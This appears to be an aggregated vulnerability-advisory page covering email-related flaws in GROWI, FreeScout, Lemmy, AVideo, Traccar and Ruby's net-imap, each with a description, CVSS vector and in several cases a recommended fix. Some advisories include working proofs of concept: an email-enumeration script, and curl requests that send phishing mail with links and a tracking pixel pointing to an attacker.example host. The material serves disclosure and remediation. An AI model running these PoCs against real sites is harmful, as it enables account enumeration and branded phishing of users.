الوصف الكامل

Path traversal vulnerability exists in GROWI v7.5.0 and earlier, which may allow an attacker to execute arbitrary EJS templates on the server when an email server is running in GROWI.

نوع الثغرة

CWE-22 — Path Traversal

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

المراجع

الوصف الكامل

FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to version 1.8.217, a user with updateAutoReply permission can store an XSS payload in the mailbox auto-reply message. The payload is rendered unescaped in the auto-reply email sent to every customer who contacts the mailbox. Email clients do not enforce CSP, so the payload executes in the customer's webmail / mail-client context. This issue has been patched in version 1.8.217.

نوع الثغرة

CWE-79 — XSS

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N

المراجع

الوصف الكامل

## Summary The unauthenticated resend-verification endpoint returns different responses for registered and unregistered email addresses. A malicious third party can submit candidate addresses to `/api/v4/account/auth/resend_verification_email` and distinguish accounts from misses. ## Details `resend_verification_email()` looks up the submitted address and returns the lookup error to the caller: ```rust let local_user_view = LocalUserView::find_by_email(&mut context.pool(), &email).await?; check_local_user_valid(&local_user_view)?; ``` The password reset endpoint already uses a safer pattern. It discards lookup errors and returns success, which prevents the same account-discovery channel. ## Proof of Concept The following script creates one user and probes that address plus a missing address. ```python import requests, random, string BASE = "http://127.0.0.1:8536/api/v4" # change to the target Lemmy URL ADMIN_USER = "lemmy" ADMIN_PASS = "lemmylemmy" PASSWORD = "Password123456!" def post(path, **body): return requests.post(BASE + path, json=body) suffix = "enum" + "".join(random.choice(string.ascii_lowercase) for _ in range(6)) admin = post("/account/auth/login", username_or_email=ADMIN_USER, password=ADMIN_PASS).json()["jwt"] requests.put(BASE + "/site", headers={"Authorization": "Bearer " + admin}, json={"registration_mode": "open", "email_verification_required": False}) email = "alice" + suffix + "@example.test" post("/account/auth/register", username="alice" + suffix, password=PASSWORD, password_verify=PASSWORD, email=email).raise_for_status() for candidate in [email, "missing" + suffix + "@example.test"]: r = post("/account/auth/resend_verification_email", email=candidate) print(candidate, "HTTP", r.status_code, r.text[:300]) ``` Output: ```text alicepoceudtpf@example.test HTTP 200 {"success":true} missingpoceudtpf@example.test HTTP 404 {"error":"not_found","cause":"Record not found"} ``` ## Impact A malicious third party can enumerate registered email addresses without authentication. The endpoint uses the registration rate limit bucket, not an endpoint-specific anti-enumeration limit, so the attacker can automate probes across candidate address lists. The response also distinguishes missing accounts from banned or deleted accounts because `check_local_user_valid()` returns separate error types. ## Recommended Fix Use the password-reset pattern for resend verification. Move the lookup and email-send work into a helper, ignore helper errors in the handler, and always return `{"success": true}` for syntactically valid input. --- *Found by [aisafe.io](https://aisafe.io)*

الإصدارات المتأثرة

All versions < 0

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P

المراجع

الوصف الكامل

### Impact Responses from the forgot password forms hinted at whether an account existed for a given email address. An unauthenticated attacker could use this to enumerate valid users, which can aid in follow-up credential-based attacks. ### Patches This has been fixed in 5.73.21 and 6.15.0. The forgot password forms now return the same generic response regardless of whether the submitted email matches a registered user.

الإصدارات المتأثرة

v3.0.0, v3.0.0-beta.1, v3.0.0-beta.10, v3.0.0-beta.11, v3.0.0-beta.12

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

المراجع

الوصف الكامل

A weakness has been identified in FlowiseAI Flowise up to 3.0.12. Affected by this vulnerability is an unknown functionality of the component User Controller Handler. This manipulation of the argument userId/organizationId/workspaceId/email causes authorization bypass. The attack may be initiated remotely. The affected component should be upgraded.

الإصدارات المتأثرة

3.0.12

نوع الثغرة

CWE-285 — CWE-285

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

المراجع

الوصف الكامل

## Summary `objects/sendEmail.json.php` exposes two branches depending on whether `contactForm=1` is submitted. When the parameter is omitted, the endpoint sets `$sendTo` to an attacker-supplied email and, for unauthenticated callers, uses the site's own contact email as the message `From:`/`Reply-To:`. The endpoint is explicitly allow-listed as a "public write action" in `objects/functionsSecurity.php` (line 885), so it requires no authentication or CSRF token. An unauthenticated attacker (solving a captcha) can force the site's own SMTP infrastructure to send attacker-composed emails to arbitrary recipients with the site's legitimate sender address, passing SPF/DKIM/DMARC for the site's domain — ideal for targeted phishing and brand impersonation. ## Details **Vulnerable code (`objects/sendEmail.json.php`):** ```php 10: $valid = Captcha::validation(@$_POST['captcha']); 11: if(User::isAdmin()){ 12: $valid = true; 13: } ... 16: if ($valid) { ... 24: $mail = new \PHPMailer\PHPMailer\PHPMailer(); 25: setSiteSendMessage($mail); // uses site's SMTP credentials ... 30: $replyTo = User::getEmail_(); 31: if (empty($replyTo)) { 32: $replyTo = $config->getContactEmail(); // <-- FALLBACK to site's own email 33: } 34: 35: $sendTo = $_POST['email']; // attacker-controlled recipient 36: 37: // if it is from contact form send the message to the siteowner and the sender is the email on the form field 38: if (!empty($_POST['contactForm'])) { 39: $replyTo = $_POST['email']; 40: $sendTo = $config->getContactEmail(); 41: } 42: 43: if (filter_var($sendTo, FILTER_VALIDATE_EMAIL)) { 44: $mail->AddReplyTo($replyTo); // site's address 45: $mail->setFrom($replyTo); // From: site's address ... 47: $mail->addAddress($sendTo); // TO: attacker-chosen victim ... 49: $safeFirstName = htmlspecialchars($_POST['first_name'], ENT_QUOTES, 'UTF-8'); 50: $mail->Subject = 'Message From Site ' . $config->getWebSiteTitle() . " ({$safeFirstName})"; 51: $mail->msgHTML($msg); ... 55: if (!$mail->send()) { ... } ``` **`User::getEmail_()` (`objects/user.php:345-352`):** returns `''` when the caller is not logged in, driving the fallback to `$config->getContactEmail()`. **Endpoint is publicly callable.** `objects/functionsSecurity.php:879-918` lists `sendEmail.json.php` in the built-in "public write actions" CSRF/same-domain bypass: ```php static $builtinBypass = [ ... // Public write actions 'sendEmail.json.php', ... ]; if (in_array($baseName, $builtinBypass, true)) { return; } ``` **Why existing defenses don't mitigate the abuse:** - **Captcha** (`Captcha::validation`): costs one solve per email. Manual solves remain viable for targeted phishing, and a separate captcha-bypass primitive in this codebase (tracked separately) automates abuse. - **`FILTER_VALIDATE_EMAIL`** (line 43): validates `$sendTo` format, preventing CRLF/header injection, but does not verify that the sender is authorized to send to that address. - **`htmlspecialchars` on `$safeEmail`/`$safeComment`/`$safeFirstName`**: blocks HTML injection in the rendered message but does not prevent phishing content — attacker fully controls the visible text (URL, instructions) and the perceived sender. - **No rate limiting, no auth check, no association between the caller and the recipient address.** **Flow summary for the abuse case (unauthenticated, no `contactForm`):** 1. `User::getEmail_()` → `''`, so `$replyTo` = site's contact email (line 32) 2. `$sendTo` = attacker's chosen recipient (line 35) 3. `contactForm` branch skipped (line 38) 4. Site's SMTP sends `From: <site contact>` to `<victim>` with attacker's subject/body (lines 44-51) Because the message is genuinely relayed by the site's mail infrastructure, SPF/DKIM/DMARC for the site's domain pass, making the phishing message indistinguishable from legitimate site mail. ## PoC Endpoint: `POST /objects/sendEmail.json.php` (also reachable via `POST /sendEmail` per `.htaccess:201`). ```bash # 1. Obtain a session + captcha image curl -c cookies.txt -s 'http://target.example.com/captcha.php?refresh=1' -o captcha.png # attacker manually solves the captcha -> e.g. 'abc123' # 2. Send phishing email. Note: contactForm is OMITTED. # - User::getEmail_() returns '' (unauth) -> $replyTo falls back to site's contact email # - $sendTo = attacker-chosen recipient # - setFrom($replyTo) -> From: is the site's real address curl -b cookies.txt -s -X POST 'http://target.example.com/objects/sendEmail.json.php' \ --data-urlencode 'captcha=abc123' \ --data-urlencode 'email=victim@target.com' \ --data-urlencode 'first_name=Support Team' \ --data-urlencode 'comment=Urgent: Your account will be suspended. Please verify at http://attacker.example.com/reset' ``` Expected server response: ```json {"error":"","success":"Message sent"} ``` Delivered headers at `victim@target.com`: ``` From: <site's legitimate contact email, e.g. contact@legit-videosite.com> Reply-To: <site's legitimate contact email> To: victim@target.com Subject: Message From Site <SiteName> (Support Team) Body: <b>Email:</b> victim@target.com<br><br>Urgent: Your account will be suspended... ``` Contrast with the intended `contactForm=1` flow (correctly routes to the site owner): ```bash curl -b cookies.txt -s -X POST 'http://target.example.com/objects/sendEmail.json.php' \ --data-urlencode 'captcha=<newcaptcha>' \ --data-urlencode 'email=attacker@attacker.com' \ --data-urlencode 'comment=hi' \ --data-urlencode 'contactForm=1' # -> $sendTo = site owner's contact email; $replyTo = attacker's email. (Normal contact form.) ``` Omitting `contactForm` inverts the routing and turns the endpoint into an unauthenticated sender-for-hire using the site's own From: identity. ## Impact - **Phishing with the site's real sender identity.** Mail originates from the site's SMTP, so SPF/DKIM/DMARC pass; the message is indistinguishable from legitimate site communications and bypasses inbox anti-phishing heuristics. - **Brand impersonation / account-takeover chains.** Attacker-controlled subject (`first_name`) and body (`comment`) support credential-harvesting pages that appear to come from the site operator. - **Mail-reputation damage.** Repeated abuse can blacklist the site's sending IP/domain, degrading legitimate mail deliverability. - **Works against any AVideo instance with SMTP configured** — a default deployment after the admin configures SMTP for standard notifications. No privileged position, credentials, or non-default flags required. ## Recommended Fix Collapse the endpoint to contact-owner-only behavior and require either authentication or `contactForm=1`. Minimal patch: ```php // objects/sendEmail.json.php ... $valid = Captcha::validation(@$_POST['captcha']); if (User::isAdmin()) { $valid = true; } // Reject the non-contactForm branch for unauthenticated callers. // The "share with a friend" flow already requires User::isLogged() // in the UI (view/.../functiongetShareMenu.php), so enforce it here too. if (empty($_POST['contactForm']) && !User::isLogged()) { $obj = new stdClass(); $obj->error = __("Authentication required"); header('Content-Type: application/json'); echo json_encode($obj); exit; } $obj = new stdClass(); $obj->error = ''; if ($valid) { ... $replyTo = User::getEmail_(); if (empty($replyTo)) { // Should no longer be reachable for arbitrary recipients. // Keep as defense-in-depth only for contactForm=1 path. $replyTo = $config->getContactEmail(); } ... } ``` Additional hardening: 1. Always use a dedicated `no-reply@` address in `setFrom()`; put the caller's address only in `Reply-To`. Never reuse `$config->getContactEmail()` as the From for user-initiated messages. 2. For the logged-in "share" flow, verify the caller's email has been confirmed, and rate-limit by user id and by IP. 3. Drop the non-`contactForm` branch entirely if no legitimate unauthenticated UI caller remains. 4. Add a visible "user-submitted message via our site" banner to the email body so recipients can distinguish these from first-party communications.

الإصدارات المتأثرة

10.4, 10.8, 11, 11.1, 11.1.1

نوع الثغرة

CWE-940 — CWE-940

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

المراجع

الوصف الكامل

## Summary `objects/notifySubscribers.json.php` takes the raw `message` POST parameter and passes it into `sendSiteEmail()`, which substitutes it directly into an HTML email template (via `str_replace` on the `{message}` placeholder) and renders it with `PHPMailer::msgHTML()`. There is no HTML sanitization, character escaping, or output encoding on the attacker-controlled `message` between `$_POST['message']` and the rendered email. Any authenticated user with upload permission can therefore broadcast arbitrary HTML — phishing links, tracking pixels, CSS/UI spoofing — to every subscriber on their channel (up to 10,000 recipients per invocation). The email is sent From: the platform's configured contact address and wrapped in the site's official logo and title, so attacker-supplied HTML arrives with the appearance of an official platform communication. ## Details **File:** `objects/notifySubscribers.json.php` ```php 10: if (!User::canUpload()) { 11: forbiddenPage('You can not notify'); 12: } 13: forbidIfIsUntrustedRequest('notifySubscribers'); 14: $user_id = User::getId(); 15: // if admin bring all subscribers 16: if (User::isAdmin()) { 17: $user_id = ''; 18: } 19: 20: require_once 'subscribe.php'; 21: setRowCount(10000); ... 23: $Subscribes = Subscribe::getAllSubscribes($user_id); ... 34: $subject = 'Message From Site ' . $config->getWebSiteTitle(); 35: $message = $_POST['message']; 36: 37: $resp = sendSiteEmail($to, $subject, $message); ``` Controls present at the entry point: - `User::canUpload()` — gates access to any account that can upload (a baseline authenticated uploader role; in typical AVideo configurations where `authCanUploadVideos` is enabled, this is any logged-in user with a verified email). - `forbidIfIsUntrustedRequest('notifySubscribers')` — in `objects/functionsSecurity.php:138-165`, this delegates to `isUntrustedRequest()` which only validates same-origin via `requestComesFromSameDomainAsMyAVideo()` (`objects/functionsAVideo.php:199-206`), i.e. a Referer/Origin header check. It is **not** a CSRF token. An attacker acting on their own authenticated browser session trivially satisfies the Referer check. There is no CAPTCHA, no rate limit, no per-recipient quota, and no unsubscribe link. `setRowCount(10000)` allows up to 10,000 subscriber rows to be pulled and mailed in a single request. For admin callers (`User::isAdmin()` → `$user_id = ''`), `Subscribe::getAllSubscribes('')` returns the entire subscriber set for the platform rather than the caller's channel. **File:** `objects/functionsMail.php` ```php 59: function sendSiteEmail($to, $subject, $message, $fromEmail = '', $fromName = '') 60: { ... 78: $subject = UTF8encode($subject); 79: $message = UTF8encode($message); // UTF-8 normalization, no HTML handling 80: $message = createEmailMessageFromTemplate($message); ... 119: $mail = new \PHPMailer\PHPMailer\PHPMailer(); 120: setSiteSendMessage($mail); ... 125: $systemEmail = $config->getContactEmail(); 126: $systemName = $config->getWebSiteTitle(); ... 136: $mail->setFrom($systemEmail, !empty($fromName) ? $fromName : $systemName); ... 143: $mail->msgHTML($message); // renders as HTML ... 162: $resp = $mail->send(); ``` ```php 266: function createEmailMessageFromTemplate($message) 267: { 268: if (preg_match("/html>/i", $message)) { 269: return $message; // attacker-supplied full-HTML is returned verbatim 270: } ... 274: $text = file_get_contents("{$global['systemRootPath']}view/include/emailTemplate.html"); ... 279: $words = [$logo, $message, $siteTitle]; 280: $replace = ['{logo}', '{message}', '{siteTitle}']; 281: 282: return str_replace($replace, $words, $text); // raw substitution into HTML template 283: } ``` Execution flow from attacker input to sink: 1. `$_POST['message']` → `objects/notifySubscribers.json.php:35` (raw, no validation). 2. → `sendSiteEmail($to, $subject, $message)` at `objects/notifySubscribers.json.php:37`. 3. → `UTF8encode($message)` at `objects/functionsMail.php:79` (encoding only; does not strip or escape HTML). 4. → `createEmailMessageFromTemplate($message)` at `objects/functionsMail.php:80` → `str_replace('{message}', $message, $text)` at `objects/functionsMail.php:282`, substituting attacker HTML directly into the `{message}` placeholder in `view/include/emailTemplate.html`. 5. → `$mail->msgHTML($message)` at `objects/functionsMail.php:143`. PHPMailer renders the combined template (containing the attacker's unsanitized HTML) as an HTML email. 6. The `From:` header is `$config->getContactEmail()` / `$config->getWebSiteTitle()` (`objects/functionsMail.php:125-136`). The template contains the platform's logo via `getURL($config->getLogo())`. The result is an attacker-controlled HTML body delivered from the platform's trusted sender address, officially branded. Note that the `preg_match("/html>/i", $message)` at line 268 actively *helps* the attacker: any payload containing `<html>` short-circuits template substitution and is sent as-is, allowing the attacker to control the full email body including DOCTYPE, head, and body. ## PoC 1. Obtain an account with upload permission (on AVideo installations where `authCanUploadVideos` is enabled, any registered and email-verified user qualifies). An admin account broadens the recipient set to the entire platform rather than just the attacker's own subscribers. 2. Ensure the attacker's channel has at least one subscriber (via `Subscribe::getAllSubscribes($user_id)`), or use an admin account to target all platform subscribers. 3. Submit the request. The `Referer` header must match the platform origin to pass `forbidIfIsUntrustedRequest` (trivial when running from the attacker's own authenticated browser): ```bash curl -b 'PHPSESSID=<uploader_session>' -X POST \ -H 'Referer: https://target.example/' \ 'https://target.example/objects/notifySubscribers.json.php' \ --data-urlencode 'message=<h1 style="color:#c00">Action Required: Verify Your Account</h1> <p>Dear Subscriber,</p> <p>We detected unusual activity on your account. Please <a href="https://attacker.example/phish">click here to verify your identity within 24 hours</a> or your account will be suspended.</p> <p>Thank you,<br>The Support Team</p> <img src="https://attacker.example/track.png" width="1" height="1">' ``` 4. Expected response: ```json {"error": false, "msg": ""} ``` 5. Every subscriber in the target set receives an HTML email: - `From:` `<contact@target.example>` (the platform's configured contact email — not the attacker's address). - `Subject:` `Message From Site <SiteTitle> - <SiteTitle>` (built at `objects/notifySubscribers.json.php:34` + `objects/functionsMail.php:138-141`). - Body: the `view/include/emailTemplate.html` template with the platform's real logo substituted at `{logo}` and the attacker's unsanitized HTML substituted at `{message}`, including the phishing anchor and tracking pixel. 6. Delivery is batched via `partition($to, $size)` at `objects/functionsMail.php:114-118` over up to 10,000 subscribers in a single request. There is no rate limit, CAPTCHA, confirmation step, or unsubscribe header. ## Impact - Any authenticated uploader can weaponize the platform's own email infrastructure and brand (contact email, logo, site title) to deliver phishing content to their channel subscribers. - Because the `From:` address is the platform's canonical contact email and the template wraps the attacker content in the official logo and site title, recipients have no visible indication that the content originated from an uploader rather than the operator. Recipients who have previously received legitimate notifications from the same address are especially likely to trust the email. - Phishing payloads can include credential-stealing links mimicking password reset / account verification flows, tracking pixels that enumerate subscriber IPs and mail-client metadata, and CSS-based UI spoofing over the template. - An admin account (`User::isAdmin()` → `$user_id = ''`) expands the blast radius to every subscriber record on the platform, not just the attacker's own subscribers. - Up to 10,000 recipients per request with no rate limiting, CAPTCHA, or unsubscribe link, so a compromised or malicious uploader can sustain large phishing campaigns at minimal cost, while the sending IP reputation is borne by the platform operator. - A stolen uploader session (e.g., via an unrelated XSS or token leak) is sufficient to mount the attack; no additional credentials or admin access are required. ## Recommended Fix Sanitize or encode `$_POST['message']` before it reaches `PHPMailer::msgHTML()`. Options, in order of preference: 1. **Reject HTML outright** and force plain text. In `objects/notifySubscribers.json.php`: ```php $message = $_POST['message'] ?? ''; // Strip all HTML; allow only newlines / plain text. $message = strip_tags($message); $message = nl2br(htmlspecialchars($message, ENT_QUOTES | ENT_HTML5, 'UTF-8')); ``` 2. **Or** allow a very restricted subset using a proven HTML sanitizer (e.g. `HTMLPurifier` with a minimal whitelist: `p, br, strong, em, a[href|title], ul, ol, li`), and forbid `<script>`, `<style>`, inline event handlers, `<img>`, `<iframe>`, `data:`/`javascript:` URIs, and framework-style template tokens. 3. **Additionally** remove the `preg_match("/html>/i", $message)` short-circuit at `objects/functionsMail.php:268-270`, which lets a caller replace the entire email body by including a `<html>` tag. The template should always be applied. 4. **Defense in depth:** - Require a real anti-CSRF token on this endpoint (e.g. `validateCSRF()` with a per-session token in a header or POST field), and drop the Referer-only `forbidIfIsUntrustedRequest` as the sole protection. - Require `User::isAdmin()` to notify subscribers from accounts not scoped to a channel; for non-admin uploaders, make the `From` display name clearly attribute the message to the uploader (`"{uploaderName} via {siteTitle} <contact@site>"` already works for non-system senders in `objects/functionsMail.php:130-134` — apply the same attribution to subscriber notifications). - Enforce per-account and per-IP rate limits on `notifySubscribers.json.php` (e.g. one broadcast per account per N hours, max M recipients per day). - Include a List-Unsubscribe header and a per-recipient unsubscribe link. - Add a preview + confirmation step before dispatch.

الإصدارات المتأثرة

10.4, 10.8, 11, 11.1, 11.1.1

نوع الثغرة

CWE-79 — XSS

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

المراجع

الوصف الكامل

Traccar is an open source GPS tracking system. In org.traccar:traccar versions starting at 6.11.1 before 6.13.0, the email notification templates insert user-controlled device, geofence, and driver names into HTML email output without proper escaping. An attacker with low privileges can store crafted HTML in these fields, which is then rendered in notification emails sent to other users with access to the affected devices. This can lead to phishing or spoofed email content. This issue is fixed in version 6.13.0.

الإصدارات المتأثرة

6.11.1 - 6.13.0

نوع الثغرة

CWE-79 — XSS

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

المراجع

الوصف الكامل

### Summary Several `Net::IMAP` commands accept a raw string argument that is sent to the server without validation or escaping. If this string is derived from user-controlled input, it may contain contain `CRLF` sequences, which an attacker can use to inject arbitrary IMAP commands. ### Details `Net::IMAP`'s generic argument handling, used by most command arguments, interprets string arguments as an IMAP `astring`. Depending on the string contents and the connection's UTF-8 support, this encodes strings as either a `atom`, `quoted`, or `literal`. These are safe from command or argument injection. But the following commands transform specific String arguments to `Net::IMAP::RawData`, which bypasses normal argument validation and encoding and prints the string directly to the socket: * `#uid_search`, `#search` * when `criteria` is a String, it is sent raw * `#uid_fetch`, `#fetch` * when `attr` is a String, it is sent raw * when `attr` is an Array, each String in `attr` is sent raw * `#uid_store`, `#store` * when `attr` is a String, it is sent raw * `#setquota`: * `limit` is interpolated with `#to_s` and that string is sent raw Because these string arguments are sent without any neutralization, they serve as a direct vector for command splitting. Any user controlled data interpolated into these strings can be used to break out of the intended command context. Using "raw data" arguments for `#uid_store`, `#store`, and `#setquota` I both inappropriate and unnecessary. `Net::IMAP`'s generic argument handling is sufficient to safely validate and encode their arguments. Users of the library probably do not expect arguments to these commands to be sent raw and might not be wary of passing unvalidated input. The API for search criteria and fetch attributes is intentionally low-level and "close to the wire". It allows developers to use some IMAP extensions without requiring explicit support from the library and allows developers to use complex IMAP grammar without complex argument translation. Even so, basic validation is appropriate and could neutralize command injection. Although this was explicitly documented for search `criteria`, it was insufficiently documented for fetch `attr`. So developers may not have realized that the `attr` argument to `#fetch` and `#uid_fetch` is sent as "raw data". ### Impact If a developer passes an unvalidated user-controlled input for one of these method arguments, an attacker can append CRLF sequence followed by a new IMAP command (like DELETE mailbox). Although this does not _directly_ enable data exfiltration, it could be combined with other attack vectors or knowledge of the target system's attributes, e.g.: shared mail folders or the application's installed response handlers. The SEARCH, STORE, and FETCH commands, and their UID variants are some of the most commonly used features of the library. Applications that build search queries or fetch attributes dynamically based on user input (e.g., mail clients or archival tools) may be at significant risk. Expected use of `Net::IMAP#setquota` is much more limited: `SETQUOTA` is often only usable by users with special administrative privileges. Depending on the server, quota administration might be managed through server configuration rather than via the IMAP protocol `SETQUOTA` command. It is expected to be uncommonly used in system administration scripts or in interactive sessions, it should be completely controlled by trusted users, and should only use trusted inputs. Calling `#setquota` with untrusted user input is expected to be a very uncommon use case. Please note however this might be combined with other attacks, for example CSRF, which provide unauthorized access to trusted inputs, and may specifically target users or scripts with administrator privileges. ### Mitigation - Update to a patched version of `net-imap` which: - validates that `Net::IMAP::RawData` is composed of well-formed IMAP `text`, `literal`, and `literal8` values, with no unescaped `NULL`, `CR`, or `LF` bytes. - does not use `Net::IMAP::RawData` for `#store`, `#uid_store`, or `#setquota`. - Prefer to send search criteria as an array of key value pairs. Avoid sending it as an interpolated string. - If an immediate upgrade is not possible: - String inputs to search criteria and fetch attributes can be validated against command injection by checking for `\r` and `\n` characters. - Hard-coding the store `attr` argument is often appropriate. Alternatively, user controlled inputs can be restricted to a small enumerated list which is valid for the calling application. - Use `Kernel#Integer` to coerce and validate user controlled inputs to `#setquota` limit.

الإصدارات المتأثرة

All versions < 0.6.0, 0.6.1, 0.6.2, 0.6.3

نوع الثغرة

CWE-77 — Command Injection

CVSS Vector

CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N

المراجع

الوصف الكامل

### Summary Symbol arguments to commands are vulnerable to a CRLF Injection / IMAP Command injection via Symbol arguments passed to IMAP commands. ### Details Symbol arguments represent IMAP "system flags", which are formatted as "atoms" (with no quoting) with a `"\"` prefix. Vulnerable versions of Net::IMAP sends the symbol name directly to the socket, with no validation. Because the Symbol input is unvalidated, it could contain invalid `flag` characters, including `SP` and `CRLF`, which could be used to finish the current command and inject new commands. Although IMAP `flag` arguments are only valid input for a few IMAP commands, most Net::IMAP commands use generic argument handling, and will allow Symbol (`flag`) inputs. Note also that the list of valid symbol inputs should be restricted to an enumerated set of standard RFC defined flag types, which have each been given specific defined semantics. Any user-provided values outside of that list of standard "system flags" needs to use the IMAP `keyword` syntax, which are sent as atoms, i.e: string inputs. Under no circumstances should `#to_sym` ever be called on unvetted user-provided input: that will always be a bug in the calling code for the simple reason that `user_input_atom` is as `\user_input_atom`. For forward compatibility with future IMAP extentions, Net::IMAP, does not restrict flag inputs to an enumerated list. That is the responsibility of the calling application code, which knows which flag semantics are valid for its context. ### Impact If a developer passes user-controlled input as a Symbol to most Net::IMAP commands, an attacker can append CRLF sequence followed by a new IMAP command (like `DELETE mailbox`). ### Mitigation * Upgrade to a version of Net::IMAP that validates Symbols are valid as an IMAP `flag`. * User-provided input should never be able to control calling `#to_sym` on string arguments. For example, do not unsafely serialize and deserialize command arguments (e.g. with YAML or Marshal) in a way that could create unvetted Symbol arguments. * For the few IMAP commands which do allow `flag` arguments, it may be appropriate to hard-code Symbol arguments or restrict them to an enumerated list which is valid for the calling application.

الإصدارات المتأثرة

All versions < 0.6.0, 0.6.1, 0.6.2, 0.6.3

نوع الثغرة

CWE-77 — Command Injection

CVSS Vector

CVSS:4.0/AV:L/AC:H/AT:P/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N

المراجع

الوصف الكامل

### Summary When authenticating a connection with `SCRAM-SHA1` or `SCRAM-SHA256`, a hostile server can perform a computational denial-of-service attack on the client process by sending a big iteration count value. ### Details A hostile IMAP server can send an arbitrarily large PBKDF2 iteration count in the SCRAM server-first-message, causing the client to perform an expensive `OpenSSL::KDF.pbkdf2_hmac` call. Because the PBKDF2 function is a blocking C extension and holds onto Ruby’s Global VM Lock, it can freeze the entire Ruby VM for the duration of the computation. OpenSSL enforces an effective maximum by using a 32-bit signed integer for the iteration count, Depending on hardware capabilities and OpenSSL version, this iteration count may be sufficient for to block all Ruby threads in the process for over seven minutes. This is listed as one of the "Security Considerations", in [RFC 7804](https://www.rfc-editor.org/rfc/rfc7804.html#page-15): > A hostile server can perform a computational denial-of-service attack on clients by sending a big iteration count value. In order to defend against that, a client implementation can pick a maximum iteration count that it is willing to use and reject any values that exceed that threshold (in such cases, the client, of course, has to fail the authentication). ### Impact During SCRAM authentication to a hostile server, the entire Ruby VM will be locked for the duration of the computation. Depending on hardware capabilities and OpenSSL version, this may take many minutes. `OpenSSL::KDF.pbkdf2_hmac` is a blocking C function, so `Timeout` cannot be used to guard against this. And it retains the Global VM lock, so other ruby threads will also be unable to run. ### Mitigation * Upgrade to a patched version of `net-imap` that adds the `max_iterations` option to the `SASL-*` authenticators, and call `Net::IMAP#authenticate` with a `max_iterations` keyword argument. **NOTE:** The default `max_iterations` is `2³¹ - 1`, the maximum signed 32 bit integer, the maximum allowed by OpenSSL. _To prevent a denial of service attack,_ this must be set to a safe value, depending on hardware and version of OpenSSL. _It is the user's responsibility_ to enforce minimum and maximum iteration counts that are appropriate for their security context. * Alternatively, avoid `SCRAM-*` mechanisms when authenticating to untrusted servers.

الإصدارات المتأثرة

All versions < 0.6.0, 0.6.1, 0.6.2, 0.6.3

نوع الثغرة

CWE-770 — Resource Exhaustion

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

المراجع

الوصف الكامل

### Summary `Net::IMAP::ResponseReader` has quadratic time complexity when reading large responses containing many string literals. A hostile server can send responses which are crafted to exhaust the client's CPU for a denial of service attack. ### Details For each literal in a response, `ResponseReader` rescans the entire growing response buffer. The regular expression that is used to scan the response buffer runs in linear time. With many literals, this becomes O(n²) total work. The regular expression should run in constant time: it is anchored to the end and only the last 23 bytes of the buffer are relevant. Because the algorithmic complexity is super-linear, this bypasses protection from `max_response_size`: a response can stay well below the default size limit while still causing very large CPU cost. `Net::IMAP::ResponseReader` runs continuously in the receiver thread until the connection closes. ### Impact This consumes disproportionate CPU time in the client's receiver thread. A hostile server could use this to exhaust the client's CPU for a denial of service attack. For a response near the default `max_response_size`, each individual regexp scan could take between 100 to 200ms on common modern hardware, and this may be repeated 200k times per megabyte of response. While the regexp is scanning, it retains the Global VM lock, preventing other threads from running. Although other threads should not be _completely_ blocked, their run time will be significantly impacted. ### Mitigation * Upgrade to a patched version of net-imap that reads responses more efficiently. * Do not connect to untrusted IMAP servers. * When connecting to untrusted servers, a _much_ smaller `max_response_size` (for example: 8KiB) will limit the impact. Although this is too small for fetching unpaginated message bodies, it should be enough for most other operations.

الإصدارات المتأثرة

All versions < 0.6.0, 0.6.1, 0.6.2, 0.6.3

نوع الثغرة

CWE-407 — CWE-407

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

المراجع

الوصف الكامل

### Summary A man-in-the-middle attacker can cause `Net::IMAP#starttls` to return "successfully", without starting TLS. ### Details When using `Net::IMAP#starttls` to upgrade a plaintext connection to use TLS, a man-in-the-middle attacker can inject a tagged `OK` response with an easily predictable tag. By sending the response before the client finishes sending the command, the command completes "successfully" before the response handler is registered. This allows `#starttls` to return without error, but the response handler is never invoked, the TLS connection is never established, and the socket remains unencrypted. This allows man-in-the-middle attackers to perform a STARTTLS stripping attack, unless the client code explicitly checks `Net::IMAP#tls_verified?`. ### Impact TLS bypass, leading to cleartext transmission of sensitive information. ### Mitigation * Upgrade to a patched version of net-imap that raises an exception whenever `#starttls` does not establish TLS. * Connect to an implicit TLS port, rather than use `STARTTLS` with a cleartext port. This is strongly recommended anyway: * [RFC 8314](https://www.rfc-editor.org/info/rfc8314): Cleartext Considered Obsolete: Use of Transport Layer Security (TLS) for Email Submission and Access * [NO STARTTLS](https://nostarttls.secvuln.info/): Why TLS is better without STARTTLS, A Security Analysis of STARTTLS in the Email Context * Explicitly verify `Net::IMAP#tls_verified?` is `true`, before using the connection after `#starttls`.

الإصدارات المتأثرة

All versions < 0.6.0, 0.6.1, 0.6.2, 0.6.3

نوع الثغرة

CWE-392 — CWE-392

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

المراجع

الوصف الكامل

